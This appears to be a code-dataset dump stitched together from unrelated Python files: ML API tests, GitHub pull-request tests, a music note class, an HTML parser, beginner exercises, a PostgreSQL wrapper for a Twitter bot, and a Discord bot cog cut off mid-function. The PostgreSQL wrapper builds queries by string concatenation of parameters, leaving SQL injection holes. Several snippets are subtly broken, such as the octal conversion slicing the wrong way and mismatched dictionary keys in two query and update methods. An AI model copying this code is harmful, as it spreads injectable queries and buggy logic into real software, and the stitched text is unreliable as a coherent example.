)
result = rv.json()
expected = {
"message": "The specified experiment does not exist",
"code": "ExperimentNotFound",
}
self.assertDictEqual(expected, result)
self.assertEqual(rv.status_code, 404)
@mock.patch(
"kfp.Client",
return_value=util.MOCK_KFP_CLIENT,
)
@mock.patch(
"platiagro.list_metrics",
side_effect=FileNotFoundError(),
)
def test_list_metrics_success_1(
self,
mock_list_metrics,
mock_kfp_client,
):
"""
Should return a list of metrics successfully.
"""
project_id = util.MOCK_UUID_1
experiment_id = util.MOCK_UUID_1
run_id = "latest"
operator_id = util.MOCK_UUID_1
rv = TEST_CLIENT.get(
f"/projects/{project_id}/experiments/{experiment_id}/runs/{run_id}/operators/{operator_id}/metrics"
)
result = rv.json()
self.assertIsInstance(result, list)
self.assertEqual(result, [])
mock_kfp_client.assert_any_call(host="http://ml-pipeline.kubeflow:8888")
mock_list_metrics.assert_any_call(
experiment_id=experiment_id, operator_id=operator_id, run_id=run_id
)
@mock.patch(
"kfp.Client",
return_value=util.MOCK_KFP_CLIENT,
)
@mock.patch(
"platiagro.list_metrics",
return_value=[{"accuracy": 1.0}],
)
def test_list_metrics_success_2(
self,
mock_list_metrics,
mock_kfp_client,
):
"""
Should return a list of metrics successfully.
"""
project_id = util.MOCK_UUID_1
experiment_id = util.MOCK_UUID_1
run_id = "latest"
operator_id = util.MOCK_UUID_1
rv = TEST_CLIENT.get(
f"/projects/{project_id}/experiments/{experiment_id}/runs/{run_id}/operators/{operator_id}/metrics"
)
result = rv.json()
self.assertIsInstance(result, list)
self.assertEqual(result, [{"accuracy": 1.0}])
mock_kfp_client.assert_any_call(host="http://ml-pipeline.kubeflow:8888")
mock_list_metrics.assert_any_call(
experiment_id=experiment_id, operator_id=operator_id, run_id=run_id
)
| StarcoderdataPython |
3285000 | <gh_stars>100-1000
import json
import subprocess
import pytest
from all_repos.push import github_pull_request
from testing.auto_namedtuple import auto_namedtuple
from testing.git import init_repo
@pytest.fixture
def fake_github_repo(tmpdir):
# hax: make the repo end with :repo/slug so it "looks" like a github repo
src = tmpdir.join('repo:user/slug')
init_repo(src)
dest = tmpdir.join('dest')
subprocess.check_call(('git', 'clone', src, dest))
subprocess.check_call((
'git', '-C', dest, 'checkout', 'origin/master', '-b', 'feature',
))
subprocess.check_call((
'git', '-C', dest, 'commit', '--allow-empty',
'-m', 'This is a commit message\n\nHere is some more information!',
))
settings = github_pull_request.Settings(api_key='fake', username='user')
return auto_namedtuple(src=src, dest=dest, settings=settings)
def test_github_pull_request(mock_urlopen, fake_github_repo):
resp = {'html_url': 'https://example/com'}
mock_urlopen.return_value.read.return_value = json.dumps(resp).encode()
with fake_github_repo.dest.as_cwd():
github_pull_request.push(fake_github_repo.settings, 'feature')
# Should have pushed the branch to origin
out = subprocess.check_output((
'git', '-C', fake_github_repo.src, 'branch',
)).decode()
assert out == ' feature\n* master\n'
# Pull request should have been made with the commit data
(req,), _ = mock_urlopen.call_args
assert req.get_full_url() == 'https://api.github.com/repos/user/slug/pulls'
assert req.method == 'POST'
data = json.loads(req.data)
assert data['title'] == 'This is a commit message'
assert data['body'] == 'Here is some more information!'
assert data['head'] == 'feature'
@pytest.fixture
def fake_github_repo_fork(tmpdir, fake_github_repo):
fork = tmpdir.join('repo:u2/slug')
subprocess.check_call(('git', 'clone', fake_github_repo.src, fork))
settings = fake_github_repo.settings._replace(fork=True, username='u2')
dct = dict(fake_github_repo._asdict(), settings=settings, fork=fork)
return auto_namedtuple(**dct)
def test_github_pull_request_with_fork(mock_urlopen, fake_github_repo_fork):
# this is a mishmash of both of the requests (satisfies both)
resp = {'full_name': 'u2/slug', 'html_url': 'https://example/com'}
mock_urlopen.return_value.read.return_value = json.dumps(resp).encode()
with fake_github_repo_fork.dest.as_cwd():
github_pull_request.push(fake_github_repo_fork.settings, 'feature')
# Should have pushed the branch to the fork
out = subprocess.check_output((
'git', '-C', fake_github_repo_fork.src, 'branch',
)).decode()
assert out == '* master\n'
out = subprocess.check_output((
'git', '-C', fake_github_repo_fork.fork, 'branch',
)).decode()
assert out == ' feature\n* master\n'
(req,), _ = mock_urlopen.call_args
assert req.get_full_url() == 'https://api.github.com/repos/user/slug/pulls'
data = json.loads(req.data)
assert data['head'] == 'u2:feature'
def test_settings_repr():
assert repr(github_pull_request.Settings('secret', 'username')) == (
'Settings(\n'
' api_key=...,\n'
" username='username',\n"
' fork=False,\n'
" base_url='https://api.github.com',\n"
')'
)
| StarcoderdataPython |
1619360 | import numpy as np
from info import freq_to_notes
class Note:
def __init__(self, pitch, signal, loudness, timestamp, duration=None, typ=None):
self.pitch = round(pitch, 3)
self.signal = round(signal, 3)
self.loudness = round(loudness, 3)
self.timestamp = timestamp
self.given_pitch = self.closest_pitch(pitch)
self.duration = duration
self.typ = typ
note_info = freq_to_notes[self.given_pitch]
self.id = note_info["id"]
self.note = note_info["note"]
self.octave = note_info["octave"]
self.alter = note_info["alter"]
def closest_pitch(self, pitch):
"""
Given a pitch finds the closest musical note. This is determined by the absolute distance in frequency (Hertz).
"""
pitches = np.array(list(freq_to_notes.keys()))
idx = (np.abs(pitches - pitch)).argmin()
return pitches[idx]
def getInfo(self):
"""
Returns all the information stored in a musical note.
"""
return (self.timestamp, self.id, self.signal, self.pitch, self.given_pitch,
self.loudness, self.note, self.octave, self.alter)
def describe(self):
"""
Prints all the information describing a note.
"""
note = str(self.note)
note += ("#" if self.alter else "")
print(f"\n{note}, octave: {self.octave}, actual pitch: {self.pitch}Hz, ideal pitch: {self.given_pitch}Hz")
print(f"timestamp: {self.timestamp}")
| StarcoderdataPython |
1637105 | from HTMLParser import HTMLParser
class CourseHTMLParser(HTMLParser):
def __init__(self):
self.status_classes = ["open-status-open", "open-status-closed", "open-status-warning", "open-status-archived"]
self.section_names = []
self.section_statuses = []
self.valid = True
HTMLParser.__init__(self)
def handle_starttag(self, tag, attrs):
if (tag == "ul"):
for pair in attrs:
if (len(pair) >= 2 and pair[0] == 'aria-label' and "Class Section" in pair[1]):
self.section_names.append(pair[1].replace("Class Section ", ""))
if (tag == "i"):
for pair in attrs:
if (len(pair) >= 2):
attrlist = pair[1].split(" ")
matches = list(filter(lambda x: x in self.status_classes, attrlist))
if (len(matches) == 1):
status = matches[0].replace("open-status-", "")
status = status.replace("warning", "waitlisted")
self.section_statuses.append(status)
def handle_data(self, data):
if "Class Not Found." in data:
self.valid = False
print("Invalid URL!")
def get_section_names(self):
return self.section_names
def get_section_statuses(self):
return self.section_statuses | StarcoderdataPython |
1642639 | <reponame>alinenog/Mundo_Python-1-2-3<gh_stars>0
# Python Exercise 37:
# Write a Python program that reads any integer and asks the user to choose
# the conversion base: 1 for binary, 2 for octal and 3 for hexadecimal.
num = int(input("Digite um número inteiro: "))
print('''Escolha a base para conversão
[1] Converter para BINARIO
[2] Converter para OCTAL
[3] Converter para HEXADECIMAL
''')
opcao = int(input("Escolha uma opcao para conversão!"))
if opcao == 1:
print('{} convertido para Binário é igual a {}.'.format(num, bin(num)[2:]))
elif opcao == 2:
print("{} convertido para Octal é {}".format(num, oct(num)[:2]))
elif opcao == 3:
print("{} convertido para Hexadecimal é {}".format(num, hex(num)[2:])) # [2:] fatiamento de string
else:
print("Escolha a opção 1, 2 ou 3") | StarcoderdataPython |
104847 | # Add 5 to number
add5 = lambda n : n + 5
print(add5(2))
print(add5(7))
print()
# Square number
sqr = lambda n : n * n
print(sqr(2))
print(sqr(7))
print()
# Next integer
nextInt = lambda n : int(n) + 1
print(nextInt(2.7))
print(nextInt(7.2))
print()
# Previous integer of half
prevInt = lambda n : int(n // 2)
print(prevInt(2.7))
print(prevInt(7.2))
print()
# Division lambda
div = lambda dvsr : lambda dvdn : dvdn / dvsr
print(div(5)(10))
print(div(3)(27)) | StarcoderdataPython |
1614414 | <filename>code/backend/twitter/wrappers/postgresql_wrapper.py
## @package twitter.wrappers
# coding: UTF-8
import psycopg2
import logging
import credentials as credentials
from api.enums import Policy as enum_policy
import django.dispatch
log = logging.getLogger("PostgreSQL")
log.setLevel(logging.DEBUG)
handler = logging.StreamHandler(open("postgres.log", "w"))
handler.setFormatter(
logging.Formatter("[%(asctime)s]:[%(levelname)s]:%(module)s - %(message)s")
)
log.addHandler(handler)
signal = django.dispatch.Signal(providing_args=["table_name"])
class PostgresAPI:
"""PostgreSQL
Encompasses methods used for all API and PDP interactions with our PostgreSQL DB.
"""
def __init__(self):
log.debug(f"Connecting to PostgreSQL Analysis with credentials: \n"
f"url={credentials.POSTGRES_URL}\n"
f"db={credentials.POSTGRES_DB}\n"
f"user={credentials.POSTGRES_USERNAME}\n"
f"port={credentials.POSTGRES_PORT}")
try:
# Connect to the PostgreSQL server
self.conn = psycopg2.connect(
host=credentials.POSTGRES_URL, database=credentials.POSTGRES_DB,
user=credentials.POSTGRES_USERNAME, password=credentials.POSTGRES_PASSWORD,
port=credentials.POSTGRES_PORT
)
self.api_types = [x[0] for x in enum_policy.api_types()]
self.filters = [x[0] for x in enum_policy.api_filter()]
self.list_of_users = []
self.list_of_tweets = []
except (Exception, psycopg2.DatabaseError) as error:
log.exception(f"Error <{error}> trying to connect to database: ")
def insert_tweet(self, data):
self.list_of_tweets.append(data)
def __save_tweet(self, data):
"""
Attempts to insert a new Tweet item into the database
@param data: The data of the item we want to insert. Should have - tweet_id, user_id, likes, retweets
@return A success or failure message ({success: True/False ; error: None/Error})
"""
try:
cursor = self.conn.cursor()
cursor.execute(
"INSERT INTO tweets (timestamp, tweet_id, user_id, likes, retweets) values (DEFAULT,%s,%s,%s,%s);",
(int(data["tweet_id"]), int(data["user_id"]), data["likes"], data["retweets"]))
self.conn.commit()
signal.send(sender=PostgresAPI, table_name="TweetStats")
cursor.close()
except psycopg2.Error as error:
self.conn.rollback()
log.exception(f"ERROR <{error}> INSERTING NEW TWEET <{data}>: ")
return {"success": False, "error": error}
except Exception as error:
self.conn.rollback()
return {"success": False, "error": error}
return {"success": True}
def insert_user(self, data):
self.list_of_users.append(data)
def __save_user(self, data):
"""
Attempts to insert a new User item into the database
@param data: The collection we want to insert the document into
@return A success or failure message ({success: True/False ; error: None/Error})
"""
try:
cursor = self.conn.cursor()
cursor.execute(
"INSERT INTO users (timestamp, user_id, followers, following, protected) values (DEFAULT,%s,%s,%s,%s);",
(data["user_id"], data["followers"], data["following"], data["protected"])
)
self.conn.commit()
signal.send(sender=PostgresAPI, table_name="users")
cursor.close()
except psycopg2.Error as error:
self.conn.rollback()
log.exception(f"ERROR <{error}> INSERTING NEW USER <{data}>: ")
return {"success": False, "error": error}
except Exception as error:
self.conn.rollback()
return {"success": False, "error": error}
return {"success": True}
def save_all(self):
"""Method to bulk save all tweets and users"""
for tweet in self.list_of_tweets:
self.__save_tweet(tweet)
self.list_of_tweets = []
log.info("Save all tweets")
for user in self.list_of_users:
self.__save_user(user)
self.list_of_users = []
log.info("Save all users")
def search_tweet(self, params=None):
"""
Searches and returns all Tweets if no data is specified, or the specific tweet matching the given parameters
@param params: The parameters we want to query
@return The query's result or error
"""
try:
cursor = self.conn.cursor()
query = "select timestamp, tweet_id, likes, retweets from tweets "
if params is None:
query += ";"
else:
query += "WHERE "
control = 0
if "tweet_id" in params.keys():
query += "tweet_id = " + str(params["tweet_id"])
control = 1
if "likes" in params.keys():
if control == 1:
query += " AND "
query += "likes = " + str(params["likes"])
control = 1
if "retweets" in params.keys():
if control == 1:
query += " AND "
query += "retweets = " + str(params["retweets"])
query += ";"
cursor.execute(query)
data = cursor.fetchall()
self.conn.commit()
cursor.close()
result = [] # Array of jsons
for tuple in data:
result.append(
{"timestamp": tuple[0], "tweet_id": int(tuple[1]), "likes": tuple[2], "retweets": tuple[3]})
return {"success": True, "data": result}
except psycopg2.Error as error:
self.conn.rollback()
return {"success": False, "error": error}
except Exception as error:
self.conn.rollback()
return {"success": False, "error": error}
def search_user(self, params=None):
"""
Searches and returns all Users if no data is specified, or the specific tweet matching the given parameters
@param params: The parameters we want to query
@return The query's result or error
"""
try:
cursor = self.conn.cursor()
query = "select timestamp, user_id, followers, following, protected from users "
if params is None:
query += ";"
else:
query += "WHERE "
control = 0
if "user_id" in params.keys():
query += "user_id = " + str(params["user_id"])
control = 1
if "followers" in params.keys():
if control == 1:
query += " AND "
query += "followers = " + str(params["followers"])
control = 1
if "protected" in params.keys():
if control == 1:
query += " AND "
query += "protected = " + str(params["followers"])
control = 1
if "following" in params.keys():
if control == 1:
query += " AND "
query += "following = " + str(params["following"])
query += ";"
cursor.execute(query)
data = cursor.fetchall()
self.conn.commit()
cursor.close()
result = [] # Array of jsons
for tuple in data:
result.append({"timestamp": tuple[0], "user_id": int(tuple[1]), "followers": tuple[2],
"following": tuple[3], "protected": tuple[4]})
return {"success": True, "data": result}
except psycopg2.Error as error:
self.conn.rollback()
return {"success": False, "error": error}
except Exception as error:
self.conn.rollback()
return {"success": False, "error": error}
def search_logs(self, params=None, limit=None):
"""
Searches and returns all logs if no data is specified, or the specific logs matching the parameters. Can also
specify the amount of logs to be retrieved. Data retrieved is ordered by the most recent
@param params: The parameters we want to query. Right now only bot_id is supported
@param limit: An optional parameter specifying the amount of logs to be retrieved
@return The query's result or error
"""
try:
cursor = self.conn.cursor()
query = "select id_bot, action, target_id, timestamp from logs "
if params is not None:
query += "WHERE "
if "bot_id" in params:
query += f"id_bot={params['bot_id']} AND "
if "target_id" in params:
query += f"target_id={params['target_id']} AND "
if "action" in params:
query += f"action='{params['action']}' AND "
if "timestamp" in params:
query += f"timestamp>'{params['timestamp']}' AND "
query = query[:-4]
query += f"ORDER BY timestamp DESC " \
f"{'limit ' + str(limit) if limit is not None else ''} ;"
cursor.execute(query)
data = cursor.fetchall()
self.conn.commit()
cursor.close()
result = [] # Array of jsons
for tuple in data:
result.append(
{"bot_id": int(tuple[0]), "action": tuple[1], "target_id": int(tuple[2]), "timestamp": tuple[3]})
return {"success": True, "data": result}
except psycopg2.Error as error:
self.conn.rollback()
return {"success": False, "error": error}
except Exception as error:
self.conn.rollback()
return {"success": False, "error": error}
def search_notifications(self, params=None):
try:
cursor = self.conn.cursor()
query = "select notifications.email,notifications.status from notifications"
if params is not None:
query += " WHERE true"
if "email" in params.keys():
query += f" AND notifications.email='{params['email']}'"
if "status" in params.keys():
query += f" AND notifications.status={params['status']}"
cursor.execute(query)
data = cursor.fetchall()
self.conn.commit()
cursor.close()
result = [] # Array of jsons
for entry in data:
result.append({'email': entry[0], 'status': entry[1]})
return {"success": True, "data": result}
except psycopg2.Error as error:
self.conn.rollback()
return {"success": False, "error": error}
except Exception as error:
self.conn.rollback()
return {"success": False, "error": error}
def search_policies(self, params=None, limit=None):
"""
Searches and returns all policies if no data is specified, or the specific policies matching the parameters.
        Can also specify the number of policies to be retrieved.
        @param params: The parameters we want to query. Supported keys: policy_id, api_name, filter, bot_id and name
        @param limit: An optional parameter specifying the number of policies to be retrieved
@return The query's result or error
"""
try:
cursor = self.conn.cursor()
query = f"select policies.api_type,policies.name,params,active,id_policy,policies.filter, policies.bots " \
f"from policies"
if params is not None:
query += " WHERE "
control = 0
if "policy_id" in params.keys():
query += 'policies.id_policy=' + str(params['policy_id'])
control = 1
if "api_name" in params.keys():
if control == 1:
query += " AND "
                    query += 'policies.api_type=\'' + params['api_name'] + '\''
control = 1
if "filter" in params.keys():
if control == 1:
query += " AND "
query += f"policies.filter='{params['filter']}'"
control = 1
if "bot_id" in params.keys():
if control == 1:
query += " AND "
query += str(params['bot_id']) + '= ANY(policies.bots)'
if "name" in params.keys():
if control == 1:
query += " AND "
query += f"policies.name='{params['name']}'"
query += f"{'limit ' + str(limit) if limit is not None else ''} ;"
cursor.execute(query)
data = cursor.fetchall()
self.conn.commit()
cursor.close()
result = [] # Array of jsons
for tuple in data:
result.append({
"API_type": tuple[0], "name": tuple[1], "params": tuple[2], "active": tuple[3],
"policy_id": int(tuple[4]), "filter": tuple[5], "bots": [int(t) for t in tuple[6]]
})
return {"success": True, "data": result}
except psycopg2.Error as error:
self.conn.rollback()
return {"success": False, "error": error}
except Exception as error:
self.conn.rollback()
return {"success": False, "error": error}
def insert_log(self, data):
"""
Attempts to insert a new Log item into the database
@param data: The data of the item we want to insert. Should have
@return A success or failure message ({success: True/False ; error: None/Error})
"""
try:
cursor = self.conn.cursor()
bot_id = int(data['bot_id'])
insertion_query = "INSERT INTO logs "
if "target_id" in data:
insertion_query += \
f"(id_bot, action, target_id) values {(bot_id, data['action'], int(data['target_id']))};"
else:
insertion_query += f"(id_bot, action) values {(bot_id, data['action'])}; "
cursor.execute(insertion_query)
log.debug(f"Inserted log <{insertion_query}> on database")
except psycopg2.Error as error:
self.conn.rollback()
log.exception(f"ERROR <{error}> INSERTING NEW LOG <{data}>: ")
return {"success": False, "error": error}
except Exception as error:
self.conn.rollback()
log.exception(f"ERROR <{error}> INSERTING NEW LOG <{data}>: ")
return {"success": False, "error": error}
self.conn.commit()
cursor.close()
try:
signal.send(sender=PostgresAPI, table_name="Log")
except Exception as error:
log.exception(f"ERROR <{error}> when signaling rest to update cache")
return {"success": True}
def insert_policy(self, data):
"""
Attempts to insert a new Log item into the database
@param data: The data of the item we want to insert.
@return A success or failure message ({success: True/False ; error: None/Error})
"""
try:
if data['api_name'] not in self.api_types:
return {"success": False, "error": "Specified API does not exist"}
if data['filter'] not in self.filters:
return {"success": False, "error": "Specified Filter does not exist"}
cursor = self.conn.cursor()
cursor.execute('select max(id_policy) from policies;')
max_id = cursor.fetchall()[0][0]
cursor.execute(
"INSERT INTO policies (api_type, filter, name, params, active, id_policy, bots) "
"values (%s,%s,%s,%s,%s,%s,%s);",
(data['api_name'], data['filter'], data["name"], data["params"], data["active"], max_id + 1,
data["bots"]))
self.conn.commit()
cursor.close()
except psycopg2.Error as error:
self.conn.rollback()
return {"success": False, "error": error}
except Exception as error:
self.conn.rollback()
return {"success": False, "error": error}
return {"success": True}
def delete_policy(self, policy_id):
"""
Deletes the policy with the given id
@param policy_id: The id of the policy we want to delete
        @return The query's result or error
"""
try:
cursor = self.conn.cursor()
query = f"delete from policies where id_policy={policy_id};"
cursor.execute(query)
self.conn.commit()
cursor.close()
return {"success": True}
except psycopg2.Error as error:
self.conn.rollback()
return {"success": False, "error": error}
except Exception as error:
self.conn.rollback()
return {"success": False, "error": error}
def update_policy(self, policy_id, params):
"""
Updates the policy with the specified policy id, changing the params specified.
@param params: The parameters we want to update.
@param policy_id: The id of the policy we want to update
        @return The query's result or error
"""
try:
if 'api_name' in params.keys():
if params['api_name'] not in self.api_types:
return {"success": False, "error": "Specified API does not exist"}
if 'filter' in params.keys():
if params['filter'] not in self.filters:
return {"success": False, "error": "Specified Filter does not exist"}
cursor = self.conn.cursor()
query = f"update policies "
query += " SET "
control = 0
if "api_type" in params.keys():
query += f"api_type='{params['api_name']}'"
control = 1
if "filter" in params.keys():
if control == 1:
query += " , "
query += f"filter='{params['filter']}'"
control = 1
if "name" in params.keys():
if control == 1:
query += " , "
query += 'name=\'' + str(params['name']) + '\''
control = 1
if "params" in params.keys():
if control == 1:
query += " , "
query += 'params=' + str(params['params'])
control = 1
if "active" in params.keys():
if control == 1:
query += " , "
query += 'active=' + str(params['active'])
control = 1
if "bot_id" in params.keys():
if control == 1:
query += " , "
query += 'bots=' + str(params['bots'])
query += f" WHERE id_policy = {policy_id}"
cursor.execute(query)
self.conn.commit()
cursor.close()
return {"success": True}
except psycopg2.Error as error:
self.conn.rollback()
return {"success": False, "error": error}
except Exception as error:
self.conn.rollback()
return {"success": False, "error": error}
def update_notifications_status(self):
cursor = self.conn.cursor()
query = "update notifications set status='f' where status='t'"
try:
cursor.execute(query)
self.conn.commit()
cursor.close()
return {"success": True}
except psycopg2.Error as error:
self.conn.rollback()
return {"success": False, "error": error}
except Exception as error:
self.conn.rollback()
return {"success": False, "error": error}
if __name__ == "__main__":
# TODO: Test and implement searching by timestamp ; Policies API
anal = PostgresAPI()
"""
anal.insert_tweet({"tweet_id": 831606548300517377, "user_id": 6253282, "likes": 100, "retweets": 2})
anal.insert_user({"user_id": 6253283, "followers": 10000, "following": 1234})
for i in anal.search_tweet()["data"]:
print(i)
for i in anal.search_user()["data"]:
print(i)
result = anal.search_policies({'api_name': 'Twitter', 'policy_id': 80, 'bot_id': 1129475305444388866}, limit=10)
if result["success"]:
for i in result["data"]:
print(i)
else:
print(result["error"])
anal.insert_log({"bot_id": 1129475305444388866, "action": "SAVING TWEET (1127597365978959872)"})
anal.insert_log({"user_id": 1129475305444388866, "action": "SAVING TWEET (1127597365978959872)"})
print(anal.insert_policy({'api_name': 'Twitter', 'filter': 'Keywords', 'name': '<NAME> found Ded',
'bots': [1129475305444388866], 'params': ['OMG'], 'active': True, 'policy_id': 421}))
print(anal.update_policy(421, {'api_name': 'Instagram', 'filter': 'Target'}))
result = anal.search_policies({'policy_id': 421})
print(result)
if result["success"]:
for i in result["data"]:
print(i)
else:
print(result["error"])
"""
| StarcoderdataPython |
3299284 | import logging
try:
from logging import NullHandler
except ImportError:
class NullHandler(logging.Handler):
def emit(self, record):
pass
logging.getLogger(__name__).addHandler(NullHandler())
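
# The NullHandler above keeps this package's logger silent unless the host application
# configures logging itself; a sketch of how an application could surface these logs:
#
#     import logging
#     logging.basicConfig(level=logging.DEBUG)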
| StarcoderdataPython |
1602233 | from contracts.models import Contract, Offence, Penalty, Termination
import datetime
def get_contract(contract_id):
contract = Contract.objects.get(pk=contract_id)
return contract
def get_penalty(penalty_id):
penalty = Penalty.objects.get(pk=penalty_id)
return penalty
def get_termination(termination_id):
termination = Termination.objects.get(pk=termination_id)
return termination
def get_offence(offence_id):
offence = Offence.objects.get(pk=offence_id)
return offence
def get_all_contracts():
return Contract.objects.all()
def get_all_offences():
return Offence.objects.all()
def get_all_penalties():
return Penalty.objects.all()
def get_active_contracts():
return Contract.objects.filter(status="Active")
def get_terminated_contracts():
return Contract.objects.exclude(status="Active")
def get_employee_contracts(employee):
return Contract.objects.filter(status="Active", employee=employee)
def is_contract_expired(contract):
"""Check if contract is expired"""
    return contract.expiry_date < datetime.date.today()  # expired once the expiry date is in the past
def get_all_terminations():
return Termination.objects.all()
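
# Query sketch (assumes a configured Django project with these models; 'employee' below is a placeholder instance):
#
#     active = get_active_contracts()
#     employee_active = get_employee_contracts(employee)
#     already_expired = [c for c in get_all_contracts() if is_contract_expired(c)]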
| StarcoderdataPython |
161098 | # coding: utf-8
#########################################################################
# 网站: <a href="http://www.crazyit.org">疯狂Java联盟</a> #
# author yeeku.H.lee <EMAIL> #
# #
# version 1.0 #
# #
# Copyright (C), 2001-2018, yeeku.H.Lee #
# #
# This program is protected by copyright laws. #
# #
# Program Name: #
# #
# <br>Date: #
#########################################################################
user_name = 'Charlie'
user_age = 8
# Output several variables and strings at once
print("读者名:" , user_name, "年龄:", user_age)
# Output several variables and strings at once, specifying a separator
print("读者名:" , user_name, "年龄:", user_age, sep='|')
# Specify the end parameter so that no newline is printed after the output
print(40, '\t', end="")
print(50, '\t', end="")
print(60, '\t', end="")
f = open("poem.txt", "w") # open the file for writing
print('沧海月明珠有泪', file=f)
print('蓝田日暖玉生烟', file=f)
f.close() | StarcoderdataPython |
3309146 | from typing import List
from app.core.DatetimeUtils import DatetimeUtils
from app.core.ServiceEntity import ServiceEntity
from app.core.ServiceMethodEntity import ServiceMethodEntity
class ServiceMethodFactory:
@staticmethod
def parse(services: dict, target, prefix):
result = list()
methods = {}
data = target["dataResult"]
data_entities = data["entities"]
for k, v in data_entities.items():
if "SERVICE_METHOD" in k:
tmp = ServiceMethodEntity(prefix)
tmp.name = v
tmp.method_id = k
methods[k] = tmp
elif "SERVICE" in k:
if k not in services:
tmp = ServiceEntity(k, v)
services[k] = tmp
data_points = data["dataPoints"]
for k, v in data_points.items():
service_id, method_id = k.split(",")
method = methods[method_id.strip()]
method.set_service(services[service_id])
for item in v:
stamp_date = DatetimeUtils.convert_from_timestamp(item[0])
if item[1]:
date_key = stamp_date
if date_key in method.points:
raise ValueError('duplicate entry')
else:
method.points[date_key] = item[1]
for k, v in methods.items():
if v.points:
result.append(v)
return result
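
# Input-shape sketch inferred from parse() above (the entity ids and values below are
# illustrative assumptions, not a documented payload format):
#
#     services = {}
#     target = {
#         "dataResult": {
#             "entities": {
#                 "SERVICE-1": "billing-service",
#                 "SERVICE_METHOD-7": "charge",
#             },
#             "dataPoints": {
#                 "SERVICE-1, SERVICE_METHOD-7": [[1609459200000, 12.5], [1609459260000, None]],
#             },
#         },
#     }
#     methods = ServiceMethodFactory.parse(services, target, prefix="prod")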
| StarcoderdataPython |
1728599 | """Definition of the bot's Utility module."""
import asyncio
import random
import re
import sys
import time
import aiohttp
import async_timeout
import discord
import os
import socket
import contextlib
import textwrap
import util.commands as commands
import util.json as json
from contextlib import suppress
from collections import OrderedDict
from datetime import datetime, timedelta
from fnmatch import filter
from io import BytesIO, StringIO
from util.const import _mention_pattern, _mentions_transforms, home_broadcast, absfmt, status_map, ch_fmt, eval_blocked, v_level_map
from util.fake import FakeContextMember, FakeMessageMember
from util.func import bdel, encode as b_encode, decode as b_decode, smartjoin
from util.asizeof import asizeof
from util.perms import check_perms, or_check_perms
import util.dynaimport as di
from .cog import Cog
for mod in ['unicodedata', 'elizabeth',
'qrcode', 'warnings', 'tesserocr', 'base64']:
globals()[mod] = di.load(mod)
mclib = di.load('util.mclib')
xkcd = di.load('util.xkcd')
have_pil = True
try:
from PIL import Image, ImageOps
except ImportError:
have_pil = False
VALID_CHARS = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_0123456789')
class Utility(Cog):
"""Random commands that can be useful here and there.
Settings, properties, and other stuff can be found here.
"""
def __init__(self, bot):
self.stopwatches = {}
super().__init__(bot)
self.logger = self.logger.getChild('utility')
@commands.command(pass_context=True, no_pm=True)
async def icon(self, ctx):
"""Retrive the current server's icon.
Usage: icon"""
sname = '**' + ctx.message.server.name + '**'
iurl = ctx.message.server.icon_url
if iurl:
await self.bot.say('Here is the link to the icon for ' + sname + ': <' + iurl + '>')
else:
await self.bot.say('The current server, ' + sname + ', does not have an icon set! :slight_frown:')
@commands.command(pass_context=True, aliases=['echo'])
async def say(self, ctx, *, stuffs: str):
"""Repeat your message.
Usage: say [message]"""
if not self.bot.selfbot:
try:
await self.bot.delete_message(ctx.message)
except discord.Forbidden:
pass
await self.bot.say(stuffs.replace('@everyone', '@\u200beveryone').replace('@here', '@\u200bhere')[:2000])
@commands.command(pass_context=True, aliases=['whois', 'who', 'userinfo', 'uinfo', 'u'])
async def user(self, ctx, *users: str):
"""Get tons of info on an user or some users.
Spaces, multiuser, and cross-server IDs work.
Usage: user {user(s)}"""
targets = []
s = ctx.message.server
if users: # huge complicated mess for spaces,
# multiuser, nicknames, mentions, IDs,
# names, and more in one go.
members = {}
for i in getattr(s, 'members', []):
members[i.mention] = i
members[i.id] = i
members[i.display_name] = i
members[i.name] = i
members[str(i)] = i
for i in users:
try:
member = s.get_member(i)
except AttributeError:
try:
member = await self.bot.get_user_info(i)
except discord.HTTPException:
member = None
if member:
targets.append(member)
else:
try:
member = await self.bot.get_user_info(i)
except discord.HTTPException:
member = None
if member:
targets.append(member)
names = []
_i = 0
while _i < len(users):
names.append(users[_i])
with suppress(KeyError):
if ' '.join(names) in members:
targets.append(members[' '.join(names)])
names = []
elif _i + 1 == len(users):
targets.append(members[users[0]])
_i = -1
users = users[1:]
names = []
_i += 1
if not targets:
await self.bot.say('**No matching users, try again! Name, nickname, name#0000 (discriminator), or ID work. Spaces do, too!**')
return
else:
targets.append(ctx.message.author)
targets = list(OrderedDict.fromkeys(targets))
for target in targets:
au = target.avatar_url
avatar_link = (au if au else target.default_avatar_url)
d_name = target.display_name
try:
t_roles = target.roles
except AttributeError:
t_roles = []
try:
t_game = target.game
except AttributeError:
t_game = None
b_roles = []
c_srv = False
c_sown = False
try:
tg_ctx = FakeContextMember(FakeMessageMember(target), self.bot)
except AttributeError:
tg_ctx = None
else:
c_srv = check_perms(tg_ctx, ('manage_server',))
c_sown = check_perms(tg_ctx, ('server_owner',))
c_own = target.id == self.bot.owner_user.id
c_adm = target.id in self.bot.store['bot_admins']
is_server = isinstance(target, discord.Member)
if c_own:
b_roles.append('Bot Owner')
if c_adm:
b_roles.append('Bot Admin')
if c_srv:
b_roles.append('Server Admin')
with suppress(ValueError, AttributeError):
t_roles.remove(target.server.default_role)
r_embed = discord.Embed(color=random.randint(0, 256**3-1))
r_embed.set_author(name=str(target), icon_url=avatar_link, url=avatar_link)
r_embed.set_thumbnail(url=avatar_link) #top right
r_embed.set_footer(text=str(target), icon_url=avatar_link)
r_embed.add_field(name='Nickname', value=('No nickname set 😦' if d_name == target.name else d_name))
r_embed.add_field(name='User ID', value=target.id)
r_embed.add_field(name='Creation Time', value=target.created_at.strftime(absfmt))
r_embed.add_field(name='Server Join Time', value=target.joined_at.strftime(absfmt) if is_server else 'Couldn\'t fetch')
r_embed.add_field(name='Server Roles', value=', '.join([str(i) for i in t_roles]) if t_roles else 'User has no server roles 😦')
r_embed.add_field(name='Bot Roles', value=', '.join(b_roles) if b_roles else 'User has no bot roles 😦')
r_embed.add_field(name='Status', value=status_map[str(target.status)] if is_server else 'Couldn\'t fetch')
try:
r_embed.add_field(name='Currently Playing', value=(str(t_game) if t_game else 'Nothing 😦'))
except TypeError:
r_embed.add_field(name='Currently Playing', value='Nothing 😦')
await self.bot.say(embed=r_embed)
@commands.command(pass_context=True, aliases=['server', 's', 'sinfo', 'infos', 'guildinfo', 'guild', 'ginfo', 'infog'], no_pm=True)
async def serverinfo(self, ctx):
"""Get loads of info about this server.
Usage: serverinfo"""
target = self.bot.user
s = ctx.message.server
au = target.avatar_url
avatar_link = (au if au else target.default_avatar_url)
ach = s.channels
chlist = [len(ach), 0, 0]
for i in ach:
